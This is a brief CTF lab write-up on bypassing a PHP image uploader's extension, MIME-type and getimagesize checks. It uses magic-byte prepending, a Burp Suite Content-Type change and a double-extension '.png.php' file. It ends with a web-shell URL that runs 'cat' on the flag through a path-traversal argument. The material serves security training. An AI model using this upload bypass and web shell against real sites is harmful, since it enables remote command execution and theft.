Simple Web 0x06(Lab - Image Space 0x03)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:9012

Background

file signature

Source code

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

<?php if (isset($_GET['source'])) { highlight_file(__FILE__); exit; } ?> <h1>Image Uploader</h1> <p>Only supports: jpg, jpeg, png</p> <form action="index.php" method="POST" enctype="multipart/form-data"> <input type="file" name="image_file"> <input type="submit" value="Upload"> </form> <p> <a href="/?source">View Source</a> </p> <?php if (!isset($_FILES['image_file'])) { die('Give me a file!'); } $filename = basename($_FILES['image_file']['name']); $extension = strtolower(explode(".", $filename)[1]); if (!in_array($extension, ['png', 'jpeg', 'jpg']) !== false) { die("Invalid file extension: $extension."); } if (in_array($_FILES['image_file']['type'], ["image/png", "image/jpeg", "image/jpg"]) === false) { die("Invalid file type: " . $_SERVER["CONTENT_TYPE"]); } list($_, $_, $type) = getimagesize($_FILES['image_file']['tmp_name']); if ($type !== IMAGETYPE_JPEG && $type !== IMAGETYPE_PNG) { die("Invalid image type."); } $prefix = bin2hex(random_bytes(8)); move_uploaded_file($_FILES['image_file']['tmp_name'], "images/${prefix}_${filename}"); echo "<img src=\"/images/${prefix}_${filename}\">"; ?>

It has 2 extra constraint must be bypassed. Use burpsuite and change valid file signature

Exploit - bypass IMAGETYPE + bypass $_FILES['image_file']['type']

1. HxD - bypass IMAGETYPE
   • Add valid file signature at the beginning from wiki page
   • png: 89 50 4E 47 0D 0A 1A 0A
   • jpg: FF D8 FF DB
2. burpsuite - bypass file type
3. Then we got shell!!!
   • payload

     1	http://h4ck3r.quest:9012/images/353d74c11becb9b1_webshell_valid_filetype.png.php?sh=cat%20../../../../flag